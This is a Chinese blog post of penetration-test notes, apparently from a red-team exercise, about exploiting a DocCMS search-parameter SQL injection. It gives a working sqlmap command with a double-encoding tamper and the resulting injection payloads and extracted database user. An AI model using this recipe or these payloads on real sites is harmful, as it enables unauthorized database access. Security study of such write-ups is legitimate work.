2021-11-6完整linux内网渗透实战笔记(域/非域对于linux其实区别不大+宝塔后台渗透+稻壳DocCMSsql注入+交互式shell用python解决乱码问题)

   

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

  启明yyds,我第一次觉得自己选对了公司,hvv估计有望了

外网打点发现web服务器有:

DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper:

sqlmap.py -u "http://网站ip/search/?keyword=123" --tamper=chardoubleencode

代码审计之_doccms2016漏洞_whojoe的博客-CSDN博客

代码审计之DocCms漏洞分析-阿里云开发者社区

 得到:current user: 'www_ddd4_com@localhost'

sqlmap identified the following injection point(s) with a total of 112 HTTP(s) requests:
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-2578' OR 4517=4517#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: keyword=123' AND GTID_SUBSET(CONCAT(0x716a7a7671,(SELECT (ELT(8175=8175,1))),0x7178717871),8175)-- sYQN

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=123' AND (SELECT 2008 FROM (SELECT(SLEEP(5)))ohfb)-- tUnc

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: keyword=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7671,0x5046774c4d75506444637a6f7a775852614f7751464566447363797445616a637465534857746b6d,0x7178717871),NULL,NULL,NULL,NULL#
---
[21:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:04:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[21:04:53] [INFO] fetching current user
current user: 'www_ddd4_com@localhost'
[21:04:53] [INFO] fetched data logged to te

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值